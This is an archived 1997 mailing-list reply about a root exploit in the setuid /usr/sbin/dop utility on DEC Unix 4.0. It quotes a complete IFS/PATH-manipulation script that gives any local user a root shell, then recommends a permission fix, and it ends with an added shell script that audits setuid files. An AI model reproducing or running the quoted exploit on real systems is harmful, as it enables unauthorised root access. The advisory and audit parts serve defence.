Security quick fix: Change protection on /usr/sbin/dop

From: Dr. Tom Blinn, 603-881-0646 <tpb_at_zk3.dec.com>
Date: Tue, 04 Mar 97 15:52:23 -0500

> Anyone can now grab root through a shell, anyone know what dop is used
> for?
> We tried this and it works!!!! Anyone have a patch???
>
> In Norwegian dop is another word for drug, such as in drug abuse (dop
> missbruk). In DEC Unix 4.0, 4.0A and 4.0B you will find /usr/sbin/dop
> setuid root.
>
> -------------------------cut here------------------------------------
> #!/bin/sh
> cat > /tmp/usr <<EOF
> #!/bin/sh
> IFS=" "
> export IFS
> exec /bin/sh
> EOF
> chmod 755 /tmp/usr
> IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
> -------------------------cut here------------------------------------
>
> run this script and get a free root shell.

On our production systems, the /usr/sbin/dop utility is protected thus:

 ls -l /usr/sbin/dop
-r-x------ 1 root bin 40960 Nov 16 06:34 /usr/sbin/dop

I would strongly recommend you make the same fix on your systems. With
this change, an attempt by anyone other than root to execute dop yields:

        /usr/sbin/dop: cannot execute

The /usr/sbin/dop utility appears to be used by the new system management
GUI components that were introduced in V4.0.

Tom
 
 Dr. Thomas P. Blinn, UNIX Software Group, Digital Equipment Corporation
  110 Spit Brook Road, MS ZKO3-2/U20 Nashua, New Hampshire 03062-2698
   Technology Partnership Engineering Phone: (603) 881-0646
    Internet: tpb_at_zk3.dec.com Digital's Easynet: alpha::tpb
     ACM Member: tpblinn_at_acm.org PC_at_Home: tom_at_felines.mv.net

  Worry kills more people than work because more people worry than work.

      Keep your stick on the ice. -- Rick Green ("Red Green")

     My favorite palindrome is: Satan, oscillate my metallic sonatas.
                                         -- Phil Agre, pagre_at_ucsd.edu

  Opinions expressed herein are my own, and do not necessarily represent
  those of my employer or anyone else, living or dead, real or imagined.
 
Received on Tue Mar 04 1997 - 23:09:15 NZDT
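
An audit sketch for the fix described in the reply above, added here as an example and not part of the original message or any Digital tooling: it lists setuid files that group or other can still execute and applies the `-r-x------` mode shown in the `ls -l` output. The function names and the temporary directory are hypothetical, and the sample files are constructed.

```shell
#!/bin/sh
# Added example: function names are hypothetical, sample files are constructed.

# Print setuid files under DIR that group or other are allowed to execute.
list_exposed_setuid() {
    find "$1" -type f -perm -4000 \( -perm -0010 -o -perm -0001 \) -print \
        2>/dev/null | sort
}

# Apply the mode shown in the message (-r-x------): owner read/execute only,
# which also clears the setuid bit.
restrict_to_owner() {
    chmod 0500 "$1"
}

# Succeed only if FILE has exactly mode 0500 (no setuid, no group/other bits).
is_owner_only() {
    [ -n "$(find "$1" -prune -type f -perm 0500 -print 2>/dev/null)" ]
}

# Demonstration on a constructed tree; nothing outside the temp dir is touched.
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/helper_a"; chmod 4755 "$d/helper_a"   # setuid, world-executable
    : > "$d/helper_b"; chmod 4500 "$d/helper_b"   # setuid, owner only
    : > "$d/plain";    chmod 0755 "$d/plain"      # not setuid
    echo "exposed before:"; list_exposed_setuid "$d"
    for f in $(list_exposed_setuid "$d"); do
        restrict_to_owner "$f"
    done
    echo "exposed after:"; list_exposed_setuid "$d"
    rm -rf "$d"
}

demo
```

On a real system, review each file `list_exposed_setuid /usr/sbin` reports before changing its mode, since some setuid programs are meant to be run by ordinary users.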
